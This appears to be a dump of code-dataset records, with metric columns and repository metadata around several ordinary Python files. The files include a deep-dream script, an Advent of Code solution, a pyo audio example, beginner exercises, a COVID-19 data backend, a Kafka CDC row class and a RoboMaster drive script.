| 0.005914
| 0.181195
| 2,478
| 70
| 100
| 35.4
| 0.864465
| 0.587974
| 0
| 0
| 0
| 0
| 0.178499
| 0.023327
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.208333
| 0
| 0.208333
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7581ce931238117bdcd49cbe392056bdbbeb384d
| 2,609
|
py
|
Python
|
examples/deep_dream.py
|
vacancy/LibNeuralArt
|
fb7696877ac2bf08e1e4e46caec9ccd14ce4797c
|
[
"MIT"
] | 1
|
2022-03-09T14:38:01.000Z
|
2022-03-09T14:38:01.000Z
|
examples/deep_dream.py
|
vacancy/LibNeuralArt
|
fb7696877ac2bf08e1e4e46caec9ccd14ce4797c
|
[
"MIT"
] | null | null | null |
examples/deep_dream.py
|
vacancy/LibNeuralArt
|
fb7696877ac2bf08e1e4e46caec9ccd14ce4797c
|
[
"MIT"
] | null | null | null |
import os
import argparse
import cv2
import numpy as np
import tensorflow as tf
from nart import opr, aopr
from nart.model import VGG16
from nart.logconf import logger
LEARNING_RATE = 1.5  # gradient-ascent step scale (divided by mean |grad| below)
JITTER = 32          # max pixel shift applied per step to reduce artifacts


def as_netin(x):
    """Add a leading batch axis so a single image matches the network input.

    Replaces the original ``lambda`` assignment (PEP 8 discourages binding
    lambdas to names); behavior is identical.
    """
    return x[np.newaxis, :]
def make_step(sess, net, end):
    """Run one deep-dream gradient-ascent step on net['input'].

    end: key of the layer whose activations are amplified (L2 of the
    activation map is the objective; its gradient w.r.t. the input drives
    the update).

    NOTE(review): this rebuilds the loss/gradient ops on every call, which
    grows the TF graph over many iterations -- consider building them once.
    """
    # random draw ox, oy -- jitter offsets in [-JITTER, JITTER]
    ox, oy = np.random.randint(-JITTER, JITTER+1, 2)
    img = sess.run(net['input'])[0]
    img = np.roll(np.roll(img, ox, 1), oy, 0) # apply jitter shift
    # Gradient of 0.5 * mean(activation^2) w.r.t. the (jittered) input.
    sess.run(net['input'].assign(as_netin(img)))
    target = net[end]
    loss = 0.5 * tf.reduce_mean(tf.pow(target, 2))
    grad = tf.gradients(loss, [net['input']])[0]
    grad = sess.run(grad)[0]
    # apply gradient ascent, with normalized gradient
    img += LEARNING_RATE / np.abs(grad).mean() * grad
    img = np.clip(img, 0, 255)  # keep pixel values in displayable range
    img = np.roll(np.roll(img, -ox, 1), -oy, 0) # unshift image
    sess.run(net['input'].assign(as_netin(img)))
def main(args):
    """Run the deep-dream loop on args.image_path, writing snapshots.

    Saves the current image every args.save_step iterations into
    args.output_path as epoch_NNNN.png.
    """
    # read the image, and load the network
    # NOTE(review): cv2.imread returns None for a bad path, which would
    # crash on img.shape below -- no explicit check here.
    img = cv2.imread(args.image_path)
    net = VGG16(args.weight_path, img.shape[0], img.shape[1])
    os.makedirs(args.output_path, exist_ok=True)
    # initialize the session
    sess = tf.Session()
    sess.run(tf.initialize_all_variables())
    sess.run(net['input'].assign(as_netin(img)))
    for i in range(0, args.nr_iters+1):
        if i != 0:
            make_step(sess, net, end=args.end)
        # save the result image every ``args.save_step'' iterations
        if i % args.save_step == 0:
            current_img = sess.run(net['input'])[0]
            output_path = os.path.join(args.output_path, 'epoch_{:04d}.png'.format(i))
            cv2.imwrite(output_path, current_img)
            logger.info('epoch {}: image written to {}'.format(i, output_path))
if __name__ == '__main__':
    # Command-line interface: weights/input/output are required, the target
    # layer and iteration counts have sensible defaults.
    parser = argparse.ArgumentParser()
    parser.add_argument('-w', dest='weight_path', required=True, help='weight path')
    parser.add_argument('-i', dest='image_path', required=True, help='input image path')
    parser.add_argument('-o', dest='output_path', required=True, help='output directory')
    parser.add_argument('-e', '--end', dest='end', default='conv5_3', help='end')
    parser.add_argument('--iter', dest='nr_iters', type=int, default=100, help='number of iterations')
    parser.add_argument('--save-step', dest='save_step', type=int, default=5, help='save step (in iteration)')
    main(parser.parse_args())
| 33.448718
| 110
| 0.651974
| 400
| 2,609
| 4.1375
| 0.355
| 0.029607
| 0.061631
| 0.045317
| 0.129909
| 0.108157
| 0.085196
| 0.085196
| 0.029003
| 0.029003
| 0
| 0.020496
| 0.19586
| 2,609
| 77
| 111
| 33.883117
| 0.768351
| 0.148333
| 0
| 0.0625
| 0
| 0
| 0.118821
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.166667
| 0
| 0.208333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75822d824753f70d530800d691025e523bb8dcb9
| 1,079
|
py
|
Python
|
5.py
|
niharikasingh/aoc2018
|
21d430d393321e6066eca22d7c6b49e5eb42d756
|
[
"MIT"
] | null | null | null |
5.py
|
niharikasingh/aoc2018
|
21d430d393321e6066eca22d7c6b49e5eb42d756
|
[
"MIT"
] | null | null | null |
5.py
|
niharikasingh/aoc2018
|
21d430d393321e6066eca22d7c6b49e5eb42d756
|
[
"MIT"
] | null | null | null |
import re

# Puzzle input: the polymer string (Advent of Code 2018, day 5).
text = ''
with open('5input1.txt', 'r') as ifile:
    text = ifile.read().strip()
def find_length(text):
    """Return the length of *text* after fully "reacting" the polymer.

    Adjacent units of the same letter but opposite case ("aA" / "Aa")
    annihilate each other, and removals cascade.  Rewritten from the
    original repeated-rescan version (worst-case quadratic with O(n)
    deletions inside the scan) to a single linear stack pass; the final
    length is identical.
    """
    stack = []
    for unit in text:
        if stack and stack[-1] != unit and stack[-1].upper() == unit.upper():
            # Opposite-polarity pair: annihilate with the previous unit.
            stack.pop()
        else:
            stack.append(unit)
    return len(stack)
# Part 2: for each letter, strip both cases from the polymer, react the
# remainder, and keep the shortest resulting length.
current_min = len(text)
for a in list('abcdefghijklmnopqrstuvwxyz'):
    to_remove = a + a.upper()
    new_text = re.sub('[' + to_remove + ']', '', text)
    # print("removing:", to_remove, "result:", new_text)
    new_min_to_test = find_length(new_text)
    # print(a, new_min_to_test)
    current_min = min(current_min, new_min_to_test)
print(current_min)
| 25.690476
| 57
| 0.489342
| 136
| 1,079
| 3.727941
| 0.360294
| 0.039448
| 0.047337
| 0.071006
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026316
| 0.36608
| 1,079
| 41
| 58
| 26.317073
| 0.714912
| 0.133457
| 0
| 0.125
| 0
| 0
| 0.043103
| 0.028017
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.03125
| 0
| 0.09375
| 0.03125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7584210fe482f4212d8e7879d8d01a58011b39a4
| 1,122
|
py
|
Python
|
venv/Lib/site-packages/pyo/examples/22-events/08-function-calls.py
|
mintzer/pupillometry-rf-back
|
cfa86fa984a49dce0123798f8de5b838c02e10d5
|
[
"CC-BY-4.0"
] | null | null | null |
venv/Lib/site-packages/pyo/examples/22-events/08-function-calls.py
|
mintzer/pupillometry-rf-back
|
cfa86fa984a49dce0123798f8de5b838c02e10d5
|
[
"CC-BY-4.0"
] | null | null | null |
venv/Lib/site-packages/pyo/examples/22-events/08-function-calls.py
|
mintzer/pupillometry-rf-back
|
cfa86fa984a49dce0123798f8de5b838c02e10d5
|
[
"CC-BY-4.0"
] | null | null | null |
"""
08-function-calls.py - Using custom algorithms with python function calls.
**EventCall** ::
EventCall(function, *args, occurrences=inf, stopEventsWhenDone=True)
EventCall calls a function, with any number of arguments (\*args) and uses
its return value for the given parameter. The example below use a function
from the random module, *randrange*, with arguments and a user-defined
function, without argument, to create a rising, then falling, amplitude curve.
"""
import random
from pyo import *
s = Server().boot()
# Amplitude state shared with riseFallAmp (dB value and ramp direction).
db = -30
dir = 1  # NOTE: shadows the builtin dir(); kept for compatibility
def riseFallAmp():
    """Ramp the amplitude between -30 and -3 dB, moving one dB per call."""
    global db, dir
    db = db + dir
    if db < -30:
        dir = 1   # hit the floor: start rising
    elif db >= -3:
        dir = -1  # hit the ceiling: start falling
    return db
# Midi notes are chosen randomly with a function from the random module,
# while the amplitude change according to the riseFallAmp function's output.
e = Events(
    # randrange(48, 72, 3): random note from 48..69 in steps of 3
    midinote=EventCall(random.randrange, 48, 72, 3),
    beat=1 / 4.0,
    # Amplitude follows the rising/falling dB ramp defined above.
    db=EventCall(riseFallAmp),
    attack=0.001,
    decay=0.05,
    sustain=0.5,
    release=0.005,
).play()
s.gui(locals())
| 22.897959
| 78
| 0.680036
| 166
| 1,122
| 4.596386
| 0.572289
| 0.035387
| 0.034076
| 0.04194
| 0.073395
| 0.073395
| 0
| 0
| 0
| 0
| 0
| 0.039773
| 0.215686
| 1,122
| 48
| 79
| 23.375
| 0.827273
| 0.606952
| 0
| 0.083333
| 0
| 0
| 0.13253
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.083333
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75858d15ba85e9ff5541366ae7ab4ccf2759852d
| 2,048
|
py
|
Python
|
main.py
|
Andrey22/Python_Lesson2_Neural_University
|
014f8da8e3002e081aba3fb1ce9dcf56e5af1d57
|
[
"MIT"
] | null | null | null |
main.py
|
Andrey22/Python_Lesson2_Neural_University
|
014f8da8e3002e081aba3fb1ce9dcf56e5af1d57
|
[
"MIT"
] | null | null | null |
main.py
|
Andrey22/Python_Lesson2_Neural_University
|
014f8da8e3002e081aba3fb1ce9dcf56e5af1d57
|
[
"MIT"
] | null | null | null |
'''
Задача 1
Вывести на экран циклом пять строк из нулей, причем каждая строка должна быть пронумерована.
'''
# Task 1: print five numbered lines of zeros (numbering shifted to 1..5).
print ('Task1')
for i in range(5):
    i+=1
    print(i,'00000')
'''
Задача 2
Пользователь в цикле вводит 10 цифр. Найти количество введеных пользователем цифр 5.
'''
# Task 2: read 10 digits from the user; count how many equal 5.
print ('Task2')
count=0
for i in range(10):
    number = int(input('Введите 1 из 10 цифр'))
    if number==5:
        count+=1
print ('Количество цифр 5 равно', count)
'''
Задача 3
Найти сумму ряда чисел от 1 до 100. Полученный результат вывести на экран.
'''
# Task 3: sum of the integers 1..100.
print ('Task3')
countnum=0
for i in range(101):
    countnum+=i
print (countnum)
'''
Задача 4
Найти произведение ряда чисел от 1 до 10. Полученный результат вывести на экран.
'''
# Task 4: product of the integers 1..10.
print ('Task4')
countnum = 1
for i in range(1,11,1):
    countnum*=i
print (countnum)
'''
Задача 5
Вывести цифры числа на каждой строчке.
'''
# Task 5: print each digit of a number on its own line (least-significant first).
print ('Task5')
number1 = int(input('Введите число'))
while number1>0:
    x = number1
    x%=10
    print (x)
    number1//=10
'''
Задача 6
Найти сумму цифр числа.
'''
# Task 6: sum of the digits of a number.
print ('Task6')
number1 = int(input('Введите число'))
sum=0  # NOTE: shadows the builtin sum()
while number1>0:
    x = number1
    x%=10
    sum+=x
    number1//=10
print (sum)
'''
Задача 7
Найти произведение цифр числа.
'''
# Task 7: product of the digits of a number.
print ('Task7')
number1 = int(input('Введите число'))
multi=1
while number1>0:
    x = number1
    x%=10
    multi*=x
    number1//=10
print (multi)
'''
Задача 8
Дать ответ на вопрос: есть ли среди цифр числа 5?
'''
# Task 8: does the number contain the digit 5?  Uses while/else: the else
# branch runs only when the loop finishes without break (no 5 found).
print ('Task8')
number = int(input('Введите число'))
while number>0:
    x = number
    x%=10
    number //= 10
    if x == 5:
        print ('Yes')
        break
else:
    print ('No')
'''
Задача 9
Найти максимальную цифру в числе
'''
# Task 9: largest digit of a number.
print ('Task9')
number = int(input('Введите число'))
max=0  # NOTE: shadows the builtin max()
while number>0:
    x = number
    x%=10
    number //= 10
    if x > max:
        max=x
print (max)
'''
Задача 10
Найти количество цифр 5 в числе
'''
# Task 10: count occurrences of the digit 5 in a number.
print ('Task10')
count=0
number = int(input('Введите число'))
while number>0:
    x = number
    x%=10
    number //= 10
    if x == 5:
        count+=1
print (count)
| 17.210084
| 92
| 0.631348
| 312
| 2,048
| 4.144231
| 0.301282
| 0.04331
| 0.081207
| 0.092807
| 0.399072
| 0.232792
| 0.174014
| 0.118329
| 0.118329
| 0.118329
| 0
| 0.068225
| 0.227051
| 2,048
| 119
| 93
| 17.210084
| 0.748579
| 0.049316
| 0
| 0.493506
| 0
| 0
| 0.135316
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.272727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7586aaf36cfc9aa4004d62afa11753f68be84c72
| 5,351
|
py
|
Python
|
PHASE_2/Application_SourceCode/backend/covid_utils.py
|
vicinx3/disease-outbreak
|
035e78875c374e2cdbd4720a4f2ed1370f63a88c
|
[
"MIT"
] | null | null | null |
PHASE_2/Application_SourceCode/backend/covid_utils.py
|
vicinx3/disease-outbreak
|
035e78875c374e2cdbd4720a4f2ed1370f63a88c
|
[
"MIT"
] | null | null | null |
PHASE_2/Application_SourceCode/backend/covid_utils.py
|
vicinx3/disease-outbreak
|
035e78875c374e2cdbd4720a4f2ed1370f63a88c
|
[
"MIT"
] | null | null | null |
import requests
import datetime
from db import convert_code
from pycountry_convert import country_name_to_country_alpha2
from pprint import pprint
import json
url = r'https://pomber.github.io/covid19/timeseries.json'
# NOTE: module-level network fetch -- runs at import time.
response = requests.get(url)
if response.status_code != 200:
    print("Failed to connect to pomber")
def convert_country(country):
    """Map a pomber dataset country name to its ISO alpha-2 code.

    Names that pycountry cannot resolve are covered by a preset table;
    returns False when no mapping exists.
    """
    preset = {
        'Congo (Brazzaville)': 'CG',
        'Congo (Kinshasa)': 'CD',
        'Cote d\'Ivoire': 'CI',
        'Holy See': 'VA',
        'Korea, South': 'KR',
        'Taiwan*': 'TW',
        'US': 'US',
        'West Bank and Gaza': 'PS',
        'Kosovo': 'XK',
        'Burma': 'MM',
    }
    code = preset.get(country)
    if code is not None:
        return code
    try:
        return country_name_to_country_alpha2(country)
    except Exception:
        return False
# Re-key the timeseries by ISO alpha-2 code, dropping unmappable countries.
result = response.json()
content = {}
for country in result:
    code = convert_country(country)
    if code:
        content[code] = result[country]
def get_date(index):
    """Return the datetime of the *index*-th sample (AU series as reference)."""
    return datetime.datetime.strptime(content['AU'][index]['date'], r'%Y-%m-%d')
# Dataset date range endpoints.
first_date = get_date(0)
last_date = get_date(-1)
def get_last_day():
    """Number of days between the first and last samples."""
    return (last_date - first_date).days
# Worldwide totals per day, summed over all countries.
total = []
for i in range(0, get_last_day() + 1):
    total.append({
        'confirmed': 0,
        'recovered': 0,
        'deaths': 0
    })
    # Accumulate this day's values from every country.
    for country in content:
        for category in ['confirmed', 'recovered', 'deaths']:
            total[i][category] += content[country][i][category]
######################
# Functions
######################
def get_codes():
    """All ISO alpha-2 codes present in the dataset."""
    return [code for code in content]
def get_countries():
    """Map each ISO alpha-2 code to its display name."""
    return {code: convert_code(code) for code in content}
def get_slider_marks():
    """Marks for a date slider: both endpoints plus a label every 14 days."""
    marks = []
    template = r'%d %b'
    marks.append({'value': 0, 'label': first_date.strftime(template)})
    marks.append({'value': get_last_day(), 'label': last_date.strftime(template)})
    # Stops 5 days before the end -- presumably so an intermediate mark
    # never crowds the final label; confirm against the UI.
    for i in range(0, get_last_day() - 5, 14):
        current_date = first_date + datetime.timedelta(days=i)
        marks.append({'value': i, 'label': current_date.strftime(template)})
    return marks
def get_cases_by_country_and_category(date, category, daily):
    """Per-country value of *category* on day *date*.

    When *daily* is true, return the day-over-day delta (cumulative value
    on day 0) instead of the cumulative count.
    """
    result = {}
    for country, series in content.items():
        value = series[date][category]
        if daily and date > 0:
            value -= series[date - 1][category]
        result[country] = value
    return result
def get_cases_by_country(date, prettify=False):
    """Per-country stats for day *date*, with an 'All countries' row first.

    NOTE(review): the *prettify* parameter is unused in this body --
    confirm whether callers rely on it.
    """
    def calc_mortality(deaths, recovered):
        # Percent of closed cases (deaths + recoveries) that were deaths.
        # NOTE: local `total` shadows the module-level totals list.
        total = deaths + recovered
        return round(deaths * 100 / total, 2) if total > 0 else 0
    result = []
    for country in content:
        current = content[country][date]
        confirmed = current['confirmed']
        recovered = current['recovered']
        deaths = current['deaths']
        mortality = calc_mortality(deaths, recovered)
        result.append({
            'country': convert_code(country),
            'confirmed': confirmed,
            'recovered': recovered,
            'deaths': deaths,
            'mortality': mortality
        })
    # Prepend the worldwide aggregate row.
    result.insert(0, {
        'country': 'All countries',
        'confirmed': total[date]['confirmed'],
        'recovered': total[date]['recovered'],
        'deaths': total[date]['deaths'],
        'mortality': calc_mortality(total[date]['deaths'], total[date]['recovered'])
    })
    return result
def get_cases_by_day(daily):
    """Worldwide time series per category.

    When *daily* is true, values are day-over-day deltas (the cumulative
    value on day 0); otherwise cumulative counts.
    """
    result = {}
    for category in ['confirmed', 'recovered', 'deaths']:
        temp = []
        for i in range(0, get_last_day() + 1):
            current_date = first_date + datetime.timedelta(days=i)
            if daily:
                value = total[i][category]
                if i > 0:
                    value -= total[i-1][category]
            else:
                value = total[i][category]
            temp.append({
                'date': current_date.strftime(r'%Y-%m-%d'),
                'value': value
            })
        result[category] = temp
    return result
def get_comparator_graph_data(country):
    """Graph data for one country ('' = worldwide totals).

    Returns {'standard': per-category cumulative series keyed by day index,
    'trajectory': points of (total confirmed, ~7-day average of new
    confirmed) for a log-log trajectory plot}.
    """
    standard = {}
    for category in ['confirmed', 'recovered', 'deaths']:
        standard[category] = []
        for i in range(0, get_last_day() + 1):
            value = total[i][category] if country == '' else content[country][i][category]
            standard[category].append({
                'date': i,
                'value': value
            })
    trajectory = []
    for i in range(0, get_last_day() + 1):
        # Accessor for cumulative confirmed counts on day x.
        if country == '':
            get = lambda x: total[x]['confirmed']
        else:
            get = lambda x: content[country][x]['confirmed']
        total_cases = get(i)
        def daily_increase(j):
            # New confirmed cases on day j (cumulative value on day 0).
            return get(j) - get(j-1) if j > 0 else get(j)
        # Average new cases over the last up-to-7 days ending at day i.
        j = i
        new_cases = 0
        while (j >= 0 and i - j < 7):
            new_cases += daily_increase(j)
            j -= 1
        new_cases = round(new_cases / (i - j))
        if new_cases > 0:
            trajectory.append({
                'total': total_cases,
                'new': new_cases
            })
    return {'standard': standard, 'trajectory': trajectory}
| 27.869792
| 90
| 0.555971
| 611
| 5,351
| 4.743044
| 0.214403
| 0.018634
| 0.024155
| 0.018979
| 0.182885
| 0.123879
| 0.068323
| 0.068323
| 0.031746
| 0
| 0
| 0.011544
| 0.303868
| 5,351
| 192
| 91
| 27.869792
| 0.766443
| 0.001682
| 0
| 0.219355
| 0
| 0.006452
| 0.106873
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.077419
| false
| 0
| 0.03871
| 0.012903
| 0.206452
| 0.012903
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
758800528ccfe0918aa562d413d55854aa70f801
| 2,398
|
py
|
Python
|
cdc_kafka/parsed_row.py
|
woodlee/sqlserver-cdc-to-kafka
|
602c17432a87c1aaee94dc6c971cde8496314fda
|
[
"MIT"
] | 10
|
2020-04-09T09:32:54.000Z
|
2021-10-04T09:20:59.000Z
|
cdc_kafka/parsed_row.py
|
woodlee/sqlserver-cdc-to-kafka
|
602c17432a87c1aaee94dc6c971cde8496314fda
|
[
"MIT"
] | 4
|
2019-10-04T14:15:32.000Z
|
2020-05-13T18:48:58.000Z
|
cdc_kafka/parsed_row.py
|
woodlee/sqlserver-cdc-to-kafka
|
602c17432a87c1aaee94dc6c971cde8496314fda
|
[
"MIT"
] | 6
|
2019-11-11T18:01:00.000Z
|
2021-06-09T09:49:57.000Z
|
import datetime
from functools import total_ordering
from typing import Tuple, Any, Dict, Optional
from . import change_index
@total_ordering
class ParsedRow(object):
    """One CDC change/snapshot row parsed and ready to publish to Kafka.

    Ordering (via total_ordering from __eq__/__lt__) sorts rows into
    publish order: change index, then event time, then table name; ties
    fall back to key values compared in reverse because snapshot rows are
    read backwards by primary key.  Note: defining __eq__ without __hash__
    makes instances unhashable.
    """
    def __init__(self, table_fq_name: str, row_kind: str, operation_name: str, event_db_time: datetime.datetime,
                 change_idx: Optional[change_index.ChangeIndex], ordered_key_field_values: Tuple[Any, ...],
                 destination_topic: str, avro_key_schema_id: int, avro_value_schema_id: int,
                 key_dict: Dict[str, Any], value_dict: Dict[str, Any]) -> None:
        # Fully-qualified source table name, e.g. "db.schema.table".
        self.table_fq_name: str = table_fq_name
        self.row_kind: str = row_kind
        self.operation_name: str = operation_name
        self.event_db_time: datetime.datetime = event_db_time
        # None for snapshot rows; set for CDC change rows.
        self.change_idx: Optional[change_index.ChangeIndex] = change_idx
        self.ordered_key_field_values: Tuple = ordered_key_field_values
        self.destination_topic: str = destination_topic
        self.avro_key_schema_id: int = avro_key_schema_id
        self.avro_value_schema_id: int = avro_value_schema_id
        self.key_dict: Dict[str, Any] = key_dict
        self.value_dict: Dict[str, Any] = value_dict
    def __eq__(self, other) -> bool:
        # Equality considers only the table and the value payload.
        if isinstance(other, ParsedRow):
            return (self.table_fq_name, self.value_dict) == (other.table_fq_name, other.value_dict)
        return False
    def __lt__(self, other: 'ParsedRow') -> bool:
        if other is None:
            return False
        if isinstance(other, ParsedRow):
            # Missing change index sorts lowest (snapshot rows).
            self_tuple = (
                self.change_idx or change_index.LOWEST_CHANGE_INDEX,
                self.event_db_time,
                self.table_fq_name
            )
            other_tuple = (
                other.change_idx or change_index.LOWEST_CHANGE_INDEX,
                other.event_db_time,
                other.table_fq_name
            )
            if self_tuple != other_tuple:
                return self_tuple < other_tuple
            # I know it seems backwards, but it's because we read snapshot rows backwards by their PKs:
            return self.ordered_key_field_values > other.ordered_key_field_values
        raise Exception(f'Cannot compare ParsedRow to object of type "{type(other)}"')
    def __repr__(self) -> str:
        return f'ParsedRow from {self.table_fq_name} of kind {self.row_kind}, change index {self.change_idx}'
| 42.070175
| 112
| 0.662219
| 319
| 2,398
| 4.61442
| 0.244514
| 0.059783
| 0.059783
| 0.050951
| 0.343071
| 0.194973
| 0.091033
| 0.052989
| 0
| 0
| 0
| 0
| 0.261885
| 2,398
| 56
| 113
| 42.821429
| 0.831638
| 0.037114
| 0
| 0.088889
| 0
| 0.022222
| 0.068487
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088889
| false
| 0
| 0.088889
| 0.022222
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75893c568f3d251f68a9d4ffb2aa6e88611b92ae
| 446
|
py
|
Python
|
mikeio/xyz.py
|
rhaDHI/mikeio
|
eb24503d935df969eac32569a41d223d6f0e2edf
|
[
"BSD-3-Clause"
] | 65
|
2019-11-27T13:42:52.000Z
|
2022-03-31T11:41:56.000Z
|
mikeio/xyz.py
|
rhaDHI/mikeio
|
eb24503d935df969eac32569a41d223d6f0e2edf
|
[
"BSD-3-Clause"
] | 178
|
2019-12-17T19:43:04.000Z
|
2022-03-31T06:54:06.000Z
|
mikeio/xyz.py
|
rhaDHI/mikeio
|
eb24503d935df969eac32569a41d223d6f0e2edf
|
[
"BSD-3-Clause"
] | 41
|
2019-12-17T18:21:04.000Z
|
2022-03-16T12:15:40.000Z
|
import pandas as pd
def read_xyz(filename):
    """Read an xyz(+name) point file into a DataFrame.

    Tries tab separation first; if that yields a single column, re-reads
    assuming single-space separation.  Columns are named x, y, z (and
    name, when a fourth column exists).
    """
    df = pd.read_csv(filename, sep="\t", header=None)
    if df.shape[1] == 1:
        df = pd.read_csv(filename, sep=" ", header=None)
    df.columns = ["x", "y", "z", "name"][0:df.shape[1]]
    return df
def dataframe_to_xyz(self, filename):
    """Write this DataFrame to `filename` as a tab-separated xyz file
    (no header row, no index column)."""
    self.to_csv(filename, sep="\t", index=False, header=False)


# Attach as a DataFrame method so callers can simply do df.to_xyz(path).
pd.DataFrame.to_xyz = dataframe_to_xyz
| 17.84
| 62
| 0.61435
| 70
| 446
| 3.785714
| 0.457143
| 0.124528
| 0.158491
| 0.083019
| 0.271698
| 0.166038
| 0
| 0
| 0
| 0
| 0
| 0.011494
| 0.219731
| 446
| 24
| 63
| 18.583333
| 0.75
| 0.008969
| 0
| 0
| 0
| 0
| 0.027273
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.083333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
758a746fea53069cc01b12087b264b7e85fe4798
| 534
|
py
|
Python
|
chassis/rechteck.py
|
ThePBone/RobomasterCheatsheet
|
14089f4a20d72700e653e291137a4cbc9d13b694
|
[
"MIT"
] | 4
|
2022-02-08T21:53:57.000Z
|
2022-03-27T21:28:20.000Z
|
chassis/rechteck.py
|
ThePBone/RobomasterCheatsheet
|
14089f4a20d72700e653e291137a4cbc9d13b694
|
[
"MIT"
] | null | null | null |
chassis/rechteck.py
|
ThePBone/RobomasterCheatsheet
|
14089f4a20d72700e653e291137a4cbc9d13b694
|
[
"MIT"
] | null | null | null |
from robomaster import robot
import time

# Drive a DJI RoboMaster along a square: four legs of "1 m forward, 90° turn".
ep_robot = robot.Robot()
xy_speed = 1/2  # m/s (translation speed)
z_speed = 90/2  # deg/s — rotation speed; the original "m/s" comment was wrong
if __name__ == '__main__':
    # Connect in direct-access ("ap") mode; the station-mode line is kept for reference.
    #ep_robot.initialize(conn_type="sta", sn="3JKDH6U0011J02")
    ep_robot.initialize(conn_type="ap")
    ep_chassis = ep_robot.chassis
    for i in range(4):
        # 1 meter forward
        ep_chassis.move(1, 0, 0, xy_speed).wait_for_completed()
        # NOTE(review): a 50 s pause per leg looks excessive — confirm intended.
        time.sleep(50)
        # 90° turn (x=0, y=0, z=90°, xy_speed=0, z_speed)
        ep_chassis.move(0, 0, 90, 0, z_speed).wait_for_completed()
    ep_robot.close()
| 24.272727
| 66
| 0.640449
| 85
| 534
| 3.729412
| 0.494118
| 0.11041
| 0.018927
| 0.132492
| 0.157729
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066015
| 0.234082
| 534
| 21
| 67
| 25.428571
| 0.706601
| 0.177903
| 0
| 0
| 0
| 0
| 0.023095
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.153846
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
758afd7cbb115376a34da86e1eeaae56905b6dcf
| 447
|
pyde
|
Python
|
processing/Mod. 6/sketch_6_1_l37/sketch_6_1_l37.pyde
|
nanam0rgana/2019-fall-polytech-cs
|
1a31acb3cf22edc930318dec17324b05dd7788d5
|
[
"MIT"
] | null | null | null |
processing/Mod. 6/sketch_6_1_l37/sketch_6_1_l37.pyde
|
nanam0rgana/2019-fall-polytech-cs
|
1a31acb3cf22edc930318dec17324b05dd7788d5
|
[
"MIT"
] | null | null | null |
processing/Mod. 6/sketch_6_1_l37/sketch_6_1_l37.pyde
|
nanam0rgana/2019-fall-polytech-cs
|
1a31acb3cf22edc930318dec17324b05dd7788d5
|
[
"MIT"
] | null | null | null |
def setup():
    """Processing setup: 500x500 canvas, smoothing on, white background,
    no outlines, HSB colour mode."""
    size(500, 500)
    smooth()
    background(255)
    noStroke()
    colorMode(HSB)
# Sketch state shared with draw()/mouseClicked() via `global`.
flug = True  # draw-enable flag; was `bool(True)` — the bool() call was redundant
i = 0  # current grid row (bound by draw's loops)
j = 0  # current grid column (bound by draw's loops)
def draw():
